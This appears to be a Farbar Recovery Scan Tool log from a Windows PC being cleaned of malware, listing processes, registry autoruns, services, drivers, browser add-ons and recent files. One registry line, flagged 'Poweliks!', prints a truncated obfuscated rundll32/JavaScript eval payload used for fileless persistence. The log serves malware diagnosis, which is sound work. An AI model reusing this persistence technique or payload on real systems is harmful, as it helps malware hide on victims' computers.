Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(IDT, Inc.) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(Stardock Corporation) C:\Program Files\Dell\DellDock\DockLogin.exe
() C:\Windows\System32\WLTRYSVC.EXE
(Dell Inc.) C:\Windows\System32\BCMWLTRY.EXE
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\Apoint.exe
(Dell Inc.) C:\Windows\System32\WLTRAY.EXE
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Microsoft Corporation) C:\Windows\ehome\ehtray.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApMsgFwd.exe
(CyberLink Corp.) C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\hidfind.exe
(Alps Electric Co., Ltd.) C:\Program Files\DellTPad\ApntEx.exe
(Microsoft Corporation) C:\Windows\ehome\ehmsas.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Dell) C:\Users\Ashley\AppData\Local\Apps\2.0\KH6XP463.OY2\CW4LTZ3J.OK8\dell..tion_0f612f649c4a10af_0005.0004_3ddfe37344028d2c\DellSystemDetect.exe
(Akamai Technologies, Inc.) C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe
(Microsoft Corporation) C:\Windows\SysWOW64\svchost.exe
(SUPERAntiSpyware.com) C:\Program Files\SUPERAntiSpyware\SASCore64.exe
(Andrea Electronics Corporation) C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_15f4e438\AESTSr64.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
() C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe
(SingleClick Systems) C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe
(Dell Inc.) C:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe
( ) C:\Windows\System32\lxducoms.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Microsoft Corporation) C:\Windows\System32\TCPSVCS.EXE
(Microsoft Corporation) C:\Windows\System32\snmp.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AcroRd32.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AdobeCollabSync.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
(Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [Apoint] => C:\Program Files\DellTPad\Apoint.exe [271872 2008-07-16] (Alps Electric Co., Ltd.)
HKLM\...\Run: [Broadcom Wireless Manager UI] => C:\Windows\system32\WLTRAY.exe [4119552 2008-11-17] (Dell Inc.)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [462848 2009-03-16] (IDT, Inc.)
HKLM-x32\...\Run: [PCMService] => C:\Program Files (x86)\Dell\MediaDirect\PCMService.exe [132392 2008-01-14] (CyberLink Corp.)
HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [30040 2009-02-26] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation)
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-19\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-20\...\Run: [WindowsWelcomeCenter] => rundll32.exe oobefldr.dll,ShowWelcomeCenter
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [DellSystemDetect] => C:\Users\Ashley\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dell\Dell System Detect.appref-ms
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [FreeRAM XP] => C:\Program Files (x86)\YourWare Solutions\FreeRAM XP Pro\FreeRAM XP Pro.exe [1591808 2006-03-23] (YourWare Solutions ™)
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Run: [uTorrent] => "C:\Users\Ashley\AppData\Roaming\uTorrent\uTorrent.exe"  /MINIMIZED
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...\MountPoints2: {7c5292e9-9623-11df-861e-005056c00008} - J:\Autorun.exe
HKU\S-1-5-21-2293499177-2261026601-659138957-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [EA Core] => C:\Program Files (x86)\Electronic Arts\EADM\Core.exe -silent
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [ehTray.exe] => C:\Windows\ehome\ehTray.exe [138240 2008-01-20] (Microsoft Corporation)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Google Update] => "C:\Users\Ashley\AppData\Local\Google\Update\GoogleUpdate.exe" /c
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Run: [Akamai NetSession Interface] => C:\Users\Ashley\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.)
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\Policies\Explorer: [NoLogOff] 0
HKU\S-1-5-21-2293499177-2261026601-659138957-1001\...\MountPoints2: {4e39f91a-cbb5-11dd-8863-806e6f6e6963} - E:\autorun.exe
Startup: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Default User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\Mcx1\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
Startup: C:\Users\RA Media Server\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dell Dock First Run.lnk
ShortcutTarget: Dell Dock First Run.lnk -> C:\Program Files\Dell\DellDock\DellDock.exe (Stardock Corporation)
BootExecute: autocheck autochk * sdnclean64.exe
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
ProxyServer: 127.0.0.1:5222
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.dell.com
URLSearchHook: ATTENTION ==> Default URLSearchHook is missing.
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}&rlz=
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Lexmark Printable Web -> {D2C5E510-BE6D-42CC-9F61-E4F939078474} -> C:\Program Files\Lexmark Printable Web\bho.dll ()
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKCU - No Name - {724D43A0-0D85-11D4-9908-00400523E39A} -  No File
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8064.0206.dll (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF ProfilePath: C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default
FF Homepage: about:home
FF NetworkProxy: "type", 0
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf -> C:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @virtools.com/3DviaPlayer -> C:\Program Files (x86)\Virtools\3D Life Player\npvirtools.dll (Dassault Systèmes)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\CrazyTalk4Native.dll (C3D)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctdomemhelper.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctframeplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\ctplayerobject.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\imagickrt.dll (BEXTech)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np-mswmp.dll (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin2.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin3.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin4.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npqtplugin5.dll (Apple Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npRLCT4Player.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npViewpoint.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\np_gp.dll (NOS Microsystems Ltd.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\rlcontentclass.dll (Reallusion Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicPacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLMusicUnpacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoicePacker.dll ()
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\RLVoiceUnpacker.dll ()
FF Extension: Geolocater - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\geolocater@3liz.com [2013-05-08]
FF Extension: Google Toolbar for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{3112ca9c-de6d-4884-a869-9855de68056c} [2010-12-09]
FF Extension: foursquarefox | foursquare for Firefox - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{8D8755DA-0541-4E4C-818A-99188622BA02} [2010-12-21]
FF Extension: DownloadHelper - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d} [2014-10-10]
FF Extension: Adobe DLM (powered by getPlus®) - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{E2883E8F-472F-4fb0-9522-AC9BF37916A7} [2009-10-28]
FF Extension: Firebug - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\firebug@software.joehewitt.com.xpi [2011-03-24]
FF Extension: Disable clipboard manipulations - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\nocopypaste@adblockplus.org.xpi [2014-02-11]
FF Extension: StumbleUpon - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{AE93811A-5C9A-4d34-8462-F7B864FC4696}.xpi [2011-06-14]
FF Extension: Adblock Plus - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2011-03-26]
FF Extension: Greasemonkey - C:\Users\Ashley\AppData\Roaming\Mozilla\Firefox\Profiles\0w0o55iv.default\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2012-08-25]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-04-11]
 
Chrome: 
=======
CHR Profile: C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Drive) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-08-27]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-28]
CHR Extension: (AdBlock) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-03-25]
CHR Extension: (Google Wallet) - C:\Users\Ashley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-22]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Ashley\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2013-08-27]
 
==================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [143120 2013-05-23] (SUPERAntiSpyware.com)
R2 DockLoginService; C:\Program Files\Dell\DellDock\DockLogin.exe [155648 2008-09-23] (Stardock Corporation) [File not signed]
R2 dsl-db; C:\ProgramData\SingleClick Systems\MySQL\bin\mysqld.exe [5730304 2007-09-14] () [File not signed]
R2 dsl-fs-sync; C:\ProgramData\SingleClick Systems\Remote Access File Sync Service\dsl_fs_sync.exe [173296 2008-09-30] (SingleClick Systems)
S3 getPlusHelper; C:\Program Files (x86)\NOS\bin\getPlus_Helper.dll [51168 2009-09-23] (NOS Microsystems Ltd.)
R2 hnmsvc; c:\ProgramData\SingleClick Systems\Advanced Networking Service\hnm_svc.exe [820464 2008-09-30] (Dell Inc.)
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]
S2 lxduCATSCustConnectService; C:\Windows\system32\spool\DRIVERS\x64\3\\lxduserv.exe [29184 2009-10-16] (Lexmark International, Inc.)
R2 lxdu_device; C:\Windows\system32\lxducoms.exe [1039360 2009-10-16] ( )
R2 lxdu_device; C:\Windows\SysWOW64\lxducoms.exe [589824 2009-10-16] ( )
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2009-05-14] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2009-05-14] (Hewlett-Packard) [File not signed]
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 simptcp; C:\Windows\SysWOW64\tcpsvcs.exe [9728 2009-08-14] (Microsoft Corporation)
R2 SNMP; C:\Windows\System32\snmp.exe [49664 2008-01-20] (Microsoft Corporation)
R2 SNMP; C:\Windows\SysWOW64\snmp.exe [47616 2008-01-20] (Microsoft Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
S3 Tenable Nessus; C:\tools\Nessus\nessus-service.exe [11264 2011-02-25] (Tenable Network Security, Inc) [File not signed]
R2 wltrysvc; C:\Windows\System32\bcmwltry.exe [3051520 2008-11-17] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cpudrv64; C:\Program Files (x86)\SystemRequirementsLab\cpudrv64.sys [17864 2009-12-18] ()
R0 gfibto; C:\Windows\System32\drivers\gfibto.sys [14456 2013-07-18] (GFI Software)
R2 npf; C:\Windows\System32\drivers\npf.sys [35344 2011-02-11] (CACE Technologies, Inc.)
R3 RLDesignVirtualAudioCableWdm; C:\Windows\System32\DRIVERS\livecamv.sys [49664 2007-02-05] ()
S3 rspLLL; C:\Windows\System32\DRIVERS\rspLLL64.sys [23968 2013-02-07] (Resplendence Software Projects Sp.)
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R0 SmartDefragDriver; C:\Windows\System32\Drivers\SmartDefragDriver.sys [21184 2013-12-24] (IObit)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2010-05-06] () [File not signed]
U3 TrueSight; C:\Windows\System32\drivers\TrueSight.sys [34808 2014-10-17] ()
U3 aa31u6kl; C:\Windows\System32\Drivers\aa31u6kl.sys [0 ] (Microsoft Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S0 Lbd; system32\DRIVERS\Lbd.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S0 vmci; system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-19 17:02 - 2014-10-19 17:02 - 00002757 _____ () C:\Users\Ashley\Desktop\JRT.txt
2014-10-19 16:38 - 2014-10-19 16:38 - 00000000 ____D () C:\Windows\ERUNT
2014-10-19 16:36 - 2014-10-19 16:36 - 00001087 _____ () C:\Users\Ashley\Desktop\MBAM.txt
2014-10-19 15:25 - 2014-10-19 17:03 - 00007722 _____ () C:\Users\Ashley\Desktop\AdwCleaner[S1].txt
2014-10-19 15:13 - 2014-10-19 15:13 - 01705698 _____ (Thisisu) C:\Users\Ashley\Downloads\JRT.exe
2014-10-19 15:10 - 2014-10-19 15:10 - 01976320 _____ () C:\Users\Ashley\Downloads\AdwCleaner.exe
2014-10-18 13:34 - 2014-10-18 13:30 - 00014582 _____ () C:\Users\Ashley\Desktop\dds.txt
2014-10-18 12:56 - 2014-10-18 12:58 - 00688992 ____R (Swearware) C:\Users\Ashley\Desktop\dds (1).com
2014-10-18 12:35 - 2014-10-18 12:35 - 00000000 _____ () C:\Users\Ashley\Desktop\bleep.txt
2014-10-17 18:03 - 2014-10-17 18:03 - 00000218 _____ () C:\Users\Study\AppData\Local\recently-used.xbel
2014-10-17 16:21 - 2014-10-17 18:04 - 00000000 ____D () C:\Users\Study\Ebooks
2014-10-17 16:04 - 2014-10-18 12:24 - 00244368 _____ () C:\Users\Ashley\AppData\Local\GDIPFONTCACHEV1.DAT
2014-10-17 14:41 - 2014-10-17 16:01 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 14:41 - 2014-10-17 14:41 - 00001192 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00001180 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-10-17 14:41 - 2014-10-17 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-10-17 14:41 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe
2014-10-17 14:40 - 2014-10-17 14:47 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 2
2014-10-17 14:26 - 2014-10-17 14:26 - 00000000 ____D () C:\Windows\Tasks\ImCleanDisabled
2014-10-17 13:49 - 2014-10-17 13:49 - 00003593 _____ () C:\Users\Ashley\Desktop\attach.zip
2014-10-17 13:48 - 2014-10-18 13:34 - 00012368 _____ () C:\Users\Ashley\Desktop\attach.txt
2014-10-17 13:29 - 2014-10-17 13:30 - 00688992 ____R (Swearware) C:\Users\Ashley\Downloads\dds.com
2014-10-17 13:20 - 2014-10-17 13:20 - 00035704 _____ () C:\Users\Ashley\Desktop\Addition.txt
2014-10-17 13:19 - 2014-10-17 13:20 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller (1).exe
2014-10-17 13:17 - 2014-10-17 14:08 - 00034808 _____ () C:\Windows\system32\Drivers\TrueSight.sys
2014-10-17 13:17 - 2014-10-17 13:17 - 00000000 ____D () C:\ProgramData\RogueKiller
2014-10-17 13:15 - 2014-10-17 13:15 - 15725144 _____ () C:\Users\Ashley\Downloads\RogueKiller.exe
2014-10-17 13:13 - 2014-10-19 17:03 - 00023657 _____ () C:\Users\Ashley\Desktop\FRST.txt
2014-10-17 13:13 - 2014-10-17 13:13 - 02112000 _____ (Farbar) C:\Users\Ashley\Downloads\FRST64 (1).exe
2014-10-17 11:53 - 2014-10-17 11:53 - 04181856 _____ (Kaspersky Lab ZAO) C:\Users\Ashley\Downloads\tdsskiller.exe
2014-10-17 11:41 - 2014-10-19 17:03 - 00000000 ____D () C:\FRST
2014-10-17 11:40 - 2014-10-17 11:40 - 02112000 _____ (Farbar) C:\Users\Ashley\Desktop\FRST64.exe
2014-10-17 10:57 - 2014-10-19 15:33 - 00091645 _____ () C:\Windows\WindowsUpdate.log
